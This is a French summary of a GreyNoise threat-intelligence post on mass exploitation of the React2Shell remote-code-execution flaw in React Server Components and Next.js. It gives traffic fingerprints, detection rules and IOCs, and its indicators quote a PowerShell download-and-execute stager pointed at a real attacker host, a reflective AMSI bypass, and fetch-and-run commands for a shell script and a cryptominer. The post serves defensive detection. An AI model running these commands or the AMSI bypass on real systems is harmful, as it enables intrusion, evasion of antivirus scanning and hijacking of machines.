Source: GreyNoise (Threat Signals) — Le billet de boB Rudis décrit ce que l’Observation Grid de GreyNoise voit des tentatives d’exploitation en cours de la vulnérabilité RCE ‘React2Shell’ (CVE-2025-55182) affectant React Server Components (RSC) et des frameworks en aval comme Next.js, avec publication de patchs et appels urgents à la mise à jour.

• Vulnérabilité et portée: l’issue, de sévérité maximale, réside dans le protocole Flight de RSC et permet une exécution de code à distance non authentifiée sur des déploiements vulnérables, avec impact aval sur Next.js. GreyNoise note que les services exposés sont facilement découvrables (BuiltWith/Wappalyzer) et qu’une exploitation opportuniste, large et peu profonde est déjà en cours.

• Activité observée: le trafic montre un mix d’infrastructures nouvelles et anciennes avec une domination de l’automatisation (peu de navigation organique). Les premières vagues se concentrent sur cette CVE, et une migration progressive vers des kits Mirai et autres botnets est détectée. Chaîne d’exploitation typique: preuve d’exécution (PoE) via powershell -c '<5 chiffres>*<5 chiffres>', puis stagers PowerShell encodés (-enc + DownloadString + IEX) et un bypass AMSI par réflexion en positionnant System.Management.Automation.AmsiUtils.amsiInitFailed à true avant l’exécution du stage suivant.

• Composition du trafic et empreintes: principaux User-Agents extraits: Go-http-client/1.1, une variante Chrome 60 marquée Assetnote/1.0.0, Safari 17.2.1, ainsi que des volumes moindres en aiohttp et python-requests, plus quelques chaînes de navigateurs ‘réels’ (souvent usurpées). Les JA4T/JA4H se concentrent sur quelques paires dominantes et des ASNs attribués aux Pays-Bas, Chine, États-Unis, Hong Kong, etc. Près de 50% des IPs d’exploitation observées sont nouvelles en décembre 2025, reflétant une rotation rapide des VPS/proxies.

• Caractère de la campagne: rien de novateur dans la chaîne (PoE arithmétique, -enc + DownloadString + IEX, bypass AMSI AmsiUtils.amsiInitFailed), mais l’ampleur et l’automatisation en font une menace sérieuse, propice au vol d’identifiants, cryptominage, prépositionnement ransomware ou revente d’accès.

• Indications de détection (extraites du billet):

  • Sur endpoints Windows: surveiller powershell.exe/pwsh.exe avec -enc/-EncodedCommand et DownloadString(/IEX).
  • Avec l’Event ID 4104: alerter sur tout script contenant au moins deux éléments parmi: System.Management.Automation.AmsiUtils, amsiInitFailed, GetField, NonPublic,Static, SetValue.
  • Agréger les occurrences de powershell -c '<chiffres>*<chiffres>' sur une courte fenêtre (indicateur fort de PoE).
  • GreyNoise propose des blocklists en temps réel via GreyNoise Block et des listes ciblées (ASNs, JA4, pays dest., etc.) pour clients entreprise.

• IOCs et artefacts réseau/TTPs:

  • Stage-1/2 fetch: http://23[.]235[.]188[.]3:652/qMqSb (port 652/tcp, chemin /qMqSb).
  • Stagers PowerShell: powershell -enc <base64> (UTF-16LE), IEX (New-Object System.Net.Webclient).DownloadString('http://23[.]235[.]188[.]3:652/qMqSb').
  • Bypass AMSI par réflexion: type System.Management.Automation.AmsiUtils, champ amsiInitFailed, setter .GetField('NonPublic,Static').SetValue($null,$true).
  • PoE: powershell -c '40138*41979', powershell -c '40320*43488' (et nombreux couples 5x5 chiffres).
  • Charges observées (exemples): appels curl/ping vers 2f7ac6[.]ceye[.]io, 45[.]157[.]233[.]80, 5axzi7[.]dnslog[.]cn; récupération/exec de sex.sh depuis 162[.]215[.]170[.]26:3000, 46[.]36[.]37[.]85:12000, vps-zap812595-1[.]zap-srv[.]com:3000; script de cryptominer C3Pool depuis raw[.]githubusercontent[.]com/.../setup_c3pool_miner.sh avec un wallet fourni.
  • UAs: Go-http-client/1.1, Assetnote/1.0.0 (Chrome 60), Safari 17.2.1, aiohttp, python-requests.
  • JA4T/JA4H (exemples): 42340_2-4-8-1-3_1460_11 + po11nn060000_3865ae1cc1d9_..., 64240_2-1-3-1-1-4_1400_8 + po10nn090000_75eeec6218a0_....

Conclusion: il s’agit d’une analyse de menace présentant l’état des tentatives d’exploitation ‘in the wild’, des empreintes réseau, des IOCs/TTPs et des pistes de détection, avec un focus sur l’usage de blocklists GreyNoise et des observations de terrain.

🧠 TTPs et IOCs détectés

TTP

[‘Exécution de code à distance non authentifiée’, “Utilisation de PowerShell pour l’exécution de commandes”, ‘Utilisation de PowerShell encodé avec -enc’, ‘Téléchargement et exécution de scripts via DownloadString et IEX’, ‘Bypass AMSI en modifiant AmsiUtils.amsiInitFailed’, ‘Exploitation opportuniste et automatisée’, ‘Utilisation de botnets comme Mirai’, “Vol d’identifiants, cryptominage, prépositionnement ransomware, revente d’accès”]

IOC

[‘http://23.235.188.3:652/qMqSb’, ‘2f7ac6.ceye.io’, ‘45.157.233.80’, ‘5axzi7.dnslog.cn’, ‘162.215.170.26:3000’, ‘46.36.37.85:12000’, ‘vps-zap812595-1.zap-srv.com:3000’, ‘raw.githubusercontent.com/…/setup_c3pool_miner.sh’, ‘Go-http-client/1.1’, ‘Assetnote/1.0.0’, ‘Safari 17.2.1’, ‘aiohttp’, ‘python-requests’]

🔗 Source originale : https://www.greynoise.io/blog/cve-2025-55182-react2shell-opportunistic-exploitation-in-the-wild-what-the-greynoise-observation-grid-is-seeing-so-far